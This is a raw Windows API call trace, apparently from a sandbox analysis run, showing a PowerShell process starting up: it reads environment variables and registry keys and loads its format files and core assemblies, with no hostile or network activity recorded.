	[0137.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0137.052] CoTaskMemFree (pv=0x204490) 
	[0137.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0137.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.676] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0141.676] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.676] CoTaskMemFree (pv=0x204490) 
	[0141.678] CoTaskMemAlloc (cb=0xcc) returned 0x2b0cc0
	[0141.678] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b0cc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.678] CoTaskMemFree (pv=0x2b0cc0) 
	[0141.678] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ada68 | out: phkResult=0x1ada68*=0x1d0) returned 0x0
	[0141.678] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad9ec, lpData=0x0, lpcbData=0x1ad9e8*=0x0 | out: lpType=0x1ad9ec*=0x2, lpData=0x0, lpcbData=0x1ad9e8*=0x6c) returned 0x0
	[0141.678] CoTaskMemAlloc (cb=0x70) returned 0x245460
	[0141.678] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad9bc, lpData=0x245460, lpcbData=0x1ad9b8*=0x6c | out: lpType=0x1ad9bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad9b8*=0x6c) returned 0x0
	[0141.678] CoTaskMemFree (pv=0x245460) 
	[0141.678] CoTaskMemAlloc (cb=0xcc) returned 0x2b0cc0
	[0141.678] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2b0cc0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.678] CoTaskMemFree (pv=0x2b0cc0) 
	[0141.678] CoTaskMemAlloc (cb=0xcc) returned 0x2b0cc0
	[0141.678] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b0cc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.678] CoTaskMemFree (pv=0x2b0cc0) 
	[0141.682] RegCloseKey (hKey=0x1d0) returned 0x0
	[0141.682] CoTaskMemAlloc (cb=0xcc) returned 0x2b0cc0
	[0141.682] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2b0cc0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.682] CoTaskMemFree (pv=0x2b0cc0) 
	[0141.682] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ada68 | out: phkResult=0x1ada68*=0x1d0) returned 0x0
	[0141.682] RegQueryValueExW (in: hKey=0x1d0, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad9ec, lpData=0x0, lpcbData=0x1ad9e8*=0x0 | out: lpType=0x1ad9ec*=0x0, lpData=0x0, lpcbData=0x1ad9e8*=0x0) returned 0x2
	[0141.683] RegCloseKey (hKey=0x1d0) returned 0x0
	[0146.019] CoTaskMemAlloc (cb=0x20c) returned 0x1b36af30
	[0146.020] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b36af30 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.471] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0146.472] GetFileType (hFile=0x330) returned 0x1
	[0146.472] SetErrorMode (uMode=0x1) returned 0x1
	[0146.472] GetFileType (hFile=0x330) returned 0x1
	[0146.476] ReadFile (in: hFile=0x330, lpBuffer=0x2d18d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18d38*, lpNumberOfBytesRead=0x1ad668*=0x1000, lpOverlapped=0x0) returned 1
	[0146.478] ReadFile (in: hFile=0x330, lpBuffer=0x2d18d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18d38*, lpNumberOfBytesRead=0x1ad668*=0x1000, lpOverlapped=0x0) returned 1
	[0146.479] ReadFile (in: hFile=0x330, lpBuffer=0x2d18d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18d38*, lpNumberOfBytesRead=0x1ad668*=0x1000, lpOverlapped=0x0) returned 1
	[0146.480] ReadFile (in: hFile=0x330, lpBuffer=0x2d18d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18d38*, lpNumberOfBytesRead=0x1ad668*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.480] ReadFile (in: hFile=0x330, lpBuffer=0x2d18193, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18193*, lpNumberOfBytesRead=0x1ad668*=0x0, lpOverlapped=0x0) returned 1
	[0146.480] ReadFile (in: hFile=0x330, lpBuffer=0x2d18d38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad668, lpOverlapped=0x0 | out: lpBuffer=0x2d18d38*, lpNumberOfBytesRead=0x1ad668*=0x0, lpOverlapped=0x0) returned 1
	[0146.482] CloseHandle (hObject=0x330) returned 1
	[0148.337] GetSystemInfo (in: lpSystemInfo=0x1ac300 | out: lpSystemInfo=0x1ac300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.338] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.501] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.623] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.623] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.624] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.626] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.626] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.627] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.129] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.130] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.132] VirtualQuery (in: lpAddress=0x1ac3b0, lpBuffer=0x1ad270, dwLength=0x30 | out: lpBuffer=0x1ad270*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.140] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0159.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.140] CoTaskMemFree (pv=0x204490) 
	[0159.613] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad868 | out: phkResult=0x1ad868*=0x2e4) returned 0x0
	[0159.613] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x1ad87c, lpData=0x0, lpcbData=0x1ad878*=0x0 | out: lpType=0x1ad87c*=0x1, lpData=0x0, lpcbData=0x1ad878*=0x74) returned 0x0
	[0159.613] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x1ad7ec, lpData=0x0, lpcbData=0x1ad7e8*=0x0 | out: lpType=0x1ad7ec*=0x1, lpData=0x0, lpcbData=0x1ad7e8*=0x74) returned 0x0
	[0159.613] CoTaskMemAlloc (cb=0x78) returned 0x245460
	[0159.613] RegQueryValueExW (in: hKey=0x2e4, lpValueName="path", lpReserved=0x0, lpType=0x1ad7bc, lpData=0x245460, lpcbData=0x1ad7b8*=0x74 | out: lpType=0x1ad7bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad7b8*=0x74) returned 0x0
	[0159.826] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0159.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.844] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0159.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.844] CoTaskMemFree (pv=0x204490) 
	[0159.845] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0159.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.845] CoTaskMemFree (pv=0x204490) 
	[0159.847] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0159.847] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.847] CoTaskMemFree (pv=0x204490) 
	[0159.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.848] SetErrorMode (uMode=0x1) returned 0x1
	[0159.848] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0159.848] GetFileType (hFile=0x32c) returned 0x1
	[0159.848] SetErrorMode (uMode=0x1) returned 0x1
	[0159.848] GetFileType (hFile=0x32c) returned 0x1
	[0159.848] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0159.907] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0159.910] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0159.945] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0159.961] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0159.981] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.002] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.019] ReadFile (in: hFile=0x32c, lpBuffer=0x328e952, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328e952*, lpNumberOfBytesRead=0x1ad3d8*=0x0, lpOverlapped=0x0) returned 1
	[0160.038] ReadFile (in: hFile=0x32c, lpBuffer=0x328f408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad3d8, lpOverlapped=0x0 | out: lpBuffer=0x328f408*, lpNumberOfBytesRead=0x1ad3d8*=0x0, lpOverlapped=0x0) returned 1
	[0160.056] CloseHandle (hObject=0x32c) returned 1
	[0160.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.160] SetErrorMode (uMode=0x1) returned 0x1
	[0160.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad380 | out: lpFileInformation=0x1ad380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.206] SetErrorMode (uMode=0x1) returned 0x1
	[0160.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad468 | out: phkResult=0x1ad468*=0x32c) returned 0x0
	[0160.207] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3ec, lpData=0x0, lpcbData=0x1ad3e8*=0x0 | out: lpType=0x1ad3ec*=0x1, lpData=0x0, lpcbData=0x1ad3e8*=0x56) returned 0x0
	[0160.207] CoTaskMemAlloc (cb=0x5a) returned 0x2adc60
	[0160.207] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3bc, lpData=0x2adc60, lpcbData=0x1ad3b8*=0x56 | out: lpType=0x1ad3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad3b8*=0x56) returned 0x0
	[0160.207] CoTaskMemFree (pv=0x2adc60) 
	[0160.207] RegCloseKey (hKey=0x32c) returned 0x0
	[0160.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.242] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x85674cf8, Data2=0x972b, Data3=0x4b55, Data4=([0]=0x8f, [1]=0xc7, [2]=0x82, [3]=0xa4, [4]=0xfe, [5]=0x99, [6]=0x55, [7]=0xf7))) returned 0x0
	[0160.309] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xfa64ee64, Data2=0x6ce9, Data3=0x4392, Data4=([0]=0xbf, [1]=0xf7, [2]=0xf3, [3]=0xba, [4]=0x70, [5]=0x2a, [6]=0xea, [7]=0x1f))) returned 0x0
	[0160.478] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x803cb710, Data2=0x7375, Data3=0x429f, Data4=([0]=0xba, [1]=0x8a, [2]=0x52, [3]=0xa0, [4]=0x12, [5]=0x63, [6]=0xf0, [7]=0xf6))) returned 0x0
	[0160.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0160.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0164.998] VirtualQuery (in: lpAddress=0x1abf00, lpBuffer=0x1acdc0, dwLength=0x30 | out: lpBuffer=0x1acdc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
